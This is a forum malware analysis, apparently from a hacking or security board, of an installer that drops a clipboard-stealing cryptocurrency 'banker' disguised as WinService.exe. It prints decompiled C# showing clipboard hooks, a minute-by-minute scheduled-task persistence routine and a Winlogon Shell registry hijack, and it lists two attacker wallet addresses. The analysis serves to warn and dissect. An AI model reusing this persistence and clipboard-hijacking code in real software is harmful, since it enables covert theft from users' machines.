Closed

INFECTED INFECTED INFECTED INFECTED

~ The file is not a .NET ASM yet the DLLS are

~ Its a Windows Installer file

~ Requires Admin Privs

~ When extracted two files are presented to us

~ Build.sfx.exe is an Archive

~ Once extracted another file lays within it under the name of "Build.exe"

~ Build.exe is a Banker / Stealer

~ Retrieves Clipbord data and then logs it

~ Renames it self to "WinService.exe" drops in the Userprofile folder

Clipbord WINAPI Imports

	                        [DllImport("User32.dll", CharSet = CharSet.Auto)]
				private static extern IntPtr SetClipboardViewer(IntPtr hWndNewViewer);

				// Token: 0x06000018 RID: 24
				[DllImport("User32.dll", CharSet = CharSet.Auto)]
				private static extern bool ChangeClipboardChain(IntPtr hWndRemove, IntPtr hWndNewNext);

~Has Regular Shell Startup and Task Startup so every minute the file will be executed. dubbed as "antikill" very poor malware

Task Startup:

                public static void AntiKill()
		{
			Process.Start(new ProcessStartInfo
			{
				FileName = "schtasks.exe",
				UseShellExecute = true,
				CreateNoWindow = false,
				WindowStyle = ProcessWindowStyle.Hidden,
				Arguments = "/create /sc MINUTE /mo 1 /tn \"Windows Service\" /tr \"" + Program.Full2 + "\" /f"
			});
			Process.Start(Program.Full2);
			Process.GetCurrentProcess().Kill();
		}

Regular Shell Startup:

		public static void StartUp()
		{
			RegistryKey registryKey = Registry.CurrentUser.CreateSubKey("Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon");
			registryKey.SetValue("Shell", "explorer.exe, " + Program.Full2);
			try
			{
				RegistryKey registryKey2 = Registry.LocalMachine.OpenSubKey("Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", true);
				registryKey2.SetValue("Shell", "explorer.exe, " + Program.Full2);
			}
			catch
			{
			}
		}

~ Has two Crypto Addresses Linked to it

ETHEREUM: 0xD42A2Ab36f2fa44d5994BFC952978A254b18c8a0

BITCOIN: 3KjaxyBz6vW1m7QWYyyDKd1CwVzqtM6nFD

~Looks like only the BTC Stealer action is in play , there is no linking IP Address to send rest of the data to

~ BUILD.exe Scan: https://www.virustot...cf8b3/detection

https://imgur.com/a/2zTDWRO

#21
Posted 21 March 2020 - 04:23 AM

#22
Posted 21 March 2020 - 04:31 AM

#23
Posted 21 March 2020 - 06:42 AM

#24
Posted 21 March 2020 - 08:14 PM

#25
Posted 21 March 2020 - 09:54 PM

#26
Posted 21 March 2020 - 10:00 PM

#27
Posted 22 March 2020 - 03:25 AM

#28
Posted 22 March 2020 - 04:33 AM

#29
Posted 22 March 2020 - 04:35 AM

#30
Posted 22 March 2020 - 05:48 AM

About Us

Navigation

Extras

Help Documents

Account

Closed

#21 Posted 21 March 2020 - 04:23 AM

#22 Posted 21 March 2020 - 04:31 AM

#23 Posted 21 March 2020 - 06:42 AM

#24 Posted 21 March 2020 - 08:14 PM

#25 Posted 21 March 2020 - 09:54 PM

#26 Posted 21 March 2020 - 10:00 PM

#27 Posted 22 March 2020 - 03:25 AM

#28 Posted 22 March 2020 - 04:33 AM

#29 Posted 22 March 2020 - 04:35 AM

#30 Posted 22 March 2020 - 05:48 AM